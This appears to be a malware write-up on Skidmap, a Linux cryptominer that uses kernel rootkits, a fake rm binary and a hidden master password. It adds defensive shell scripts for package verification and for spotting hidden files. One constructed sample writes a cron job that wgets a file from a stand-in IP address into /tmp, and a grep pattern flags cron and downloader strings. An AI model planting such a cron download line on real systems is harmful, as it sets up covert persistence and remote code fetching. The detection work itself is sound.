According to a report, a recently discovered cryptocurrency-mining malware targeting Linux machines uses kernel-mode rootkits to make detection more difficult.

The malware, called Skidmap, can also set up a secret master password that gives it access to any user account on the system.

Several of the miner's routines require root access, which indicates that its initial attack vector is one that had already given the attackers root or administrative access to the system.

The threat installs itself via crontab, after which the installation script downloads the main binary. It lowers the system's security settings either by setting SELinux to permissive mode or by disabling the SELinux policy and setting selected processes to run in confined domains. An unexplained change of SELinux from enforcing to permissive, or a new cron entry that downloads and executes something, is therefore an early indicator worth alerting on.

The main binary checks whether the system runs Debian or RHEL/CentOS and drops the miner and the other components accordingly.

Other Skidmap components serve to obscure its activities and to ensure that they keep running.

The first of these, researchers found, is a fake “rm” binary that replaces the original. This file sets up a malicious cron job to download and execute a file, but the routine is only executed at random, so a single observed invocation of rm will not necessarily reveal it.
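The practical check for a replaced rm (and, given the master-password component, for the authentication libraries) is to verify the binaries against the packages that own them, branching on rpm versus dpkg much as the malware itself branches on the distribution. The shell functions below are an added example, not code from the report. The package names verified (coreutils plus pam on RHEL/CentOS or libpam-modules on Debian), the baseline-file format and the string heuristic are assumptions for illustration, and the sample files are constructed.

```shell
#!/bin/sh
# Added example: verify rm and the PAM modules against their owning packages,
# with an offline hash-baseline fallback and a string heuristic. Not code from
# the report; package names and the heuristic are assumptions.

# Which package database the host has (mirrors the Debian vs RHEL/CentOS branch).
pkg_family() {
    if command -v rpm >/dev/null 2>&1; then echo rpm
    elif command -v dpkg >/dev/null 2>&1; then echo dpkg
    else echo none; fi
}

# Verify the packages that own rm and pam_unix.so. Both tools print one line per
# file whose content or metadata no longer matches the package and return non-zero.
verify_core_packages() {
    case $(pkg_family) in
        rpm)  rpm -V coreutils pam ;;
        dpkg) dpkg -V coreutils libpam-modules ;;
        none) echo 'no package manager found; use baseline_diff instead' >&2; return 2 ;;
    esac
}

# Record "sha256  path" lines for the given files, taken from a known-good host.
baseline_write() {
    sha256sum "$@"
}

# Print every path in a baseline file whose current hash differs (or which is
# missing). Returns 0 when everything matches, 1 otherwise.
baseline_diff() {
    changed=$(sha256sum -c --quiet "$1" 2>/dev/null | sed -n 's/: FAILED.*$//p')
    [ -z "$changed" ] && return 0
    printf '%s\n' "$changed"
    return 1
}

# Heuristic (assumption): a genuine rm contains no cron or downloader strings.
# Prints the strings found; returns 0 if any were found, i.e. the file is suspect.
suspicious_strings() {
    grep -a -o -E 'crontab|/etc/cron|wget|curl' "$1" | sort -u | grep .
}

# Constructed samples in the directory given as $1: a benign stand-in for rm and
# a tampered one that installs a cron job the way the fake rm does.
write_samples() {
    printf '#!/bin/sh\nexec /bin/true "$@"\n' > "$1/rm.clean"
    printf '#!/bin/sh\n(crontab -l 2>/dev/null; echo "* * * * * wget -q http://198.51.100.23/x -O /tmp/.x") | crontab -\n' > "$1/rm.fake"
    printf 'benign data\n' > "$1/other"
}

if [ "${1-}" = "--run" ]; then
    verify_core_packages
fi
```

On Debian systems with a merged /usr, dpkg registers rm under /usr/bin, which is why the example verifies whole packages rather than querying the owner of /bin/rm. The baseline must be written on a host you trust and stored off the machine; a baseline written after compromise only certifies the fake binary.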

The threat uses specific modules for different kernel versions, which ensures that the dropped kernel-mode rootkits do not crash the system.

A third component is “iproute,” which hooks the getdents system call (the call used to read the contents of a directory) in order to hide specific files. Anything that enumerates directories, from ls to a file-integrity scanner, therefore sees a filtered view, while a direct stat() of a name the rootkit hides can still succeed.
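A user-space check that exploits that gap: obtain a file name from somewhere other than a directory listing, stat() it, and see whether the listing agrees. The functions below are an added example, not code from the report. Taking candidate names from /proc/<pid>/exe is an assumption about where hidden names can be recovered from (a hidden file that is still executing is named there), and the sample directory is constructed. A rootkit that also filters stat() or open() defeats this check, so it is a cheap first pass, not proof of a clean host.

```shell
#!/bin/sh
# Added example: find names that stat() can see but the directory listing
# (served by getdents) does not. Not code from the report.

# hidden_in_dir DIR NAME...: print each NAME that exists under DIR according to
# stat() but is absent from DIR's listing. A getdents hook that filters names
# produces exactly this discrepancy.
hidden_in_dir() {
    dir=$1
    shift
    listing=$(ls -A -- "$dir" 2>/dev/null)   # enumerated via getdents()
    for name in "$@"; do
        # [ -e ] uses stat(); the grep checks for an exact line in the listing
        if [ -e "$dir/$name" ] && ! printf '%s\n' "$listing" | grep -qxF -- "$name"; then
            printf '%s\n' "$name"
        fi
    done
}

# Candidate source (assumption for illustration): executables of running
# processes, read from the /proc/<pid>/exe symlinks rather than from a listing.
running_exes() {
    for p in /proc/[0-9]*; do
        readlink "$p/exe" 2>/dev/null
    done | sed 's/ (deleted)$//' | sort -u
}

# Report running executables whose file is missing from its directory listing.
check_running_exes() {
    running_exes | while IFS= read -r path; do
        d=$(dirname -- "$path")
        b=$(basename -- "$path")
        if [ -n "$(hidden_in_dir "$d" "$b")" ]; then
            printf 'hidden from listing: %s\n' "$path"
        fi
    done
}

# Constructed sample directory: prints its path so it can be inspected offline.
make_sample_dir() {
    d=$(mktemp -d)
    : > "$d/visible"
    : > "$d/.dotfile"
    : > "$d/hidden"
    printf '%s\n' "$d"
}

if [ "${1-}" = "--run" ]; then
    check_running_exes
fi
```

Cron spools, PAM configuration and the paths named in /proc/<pid>/maps are other candidate sources worth feeding to hidden_in_dir on a suspect host.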

The final component is “netlink,” a rootkit that falsifies the system's network traffic statistics.
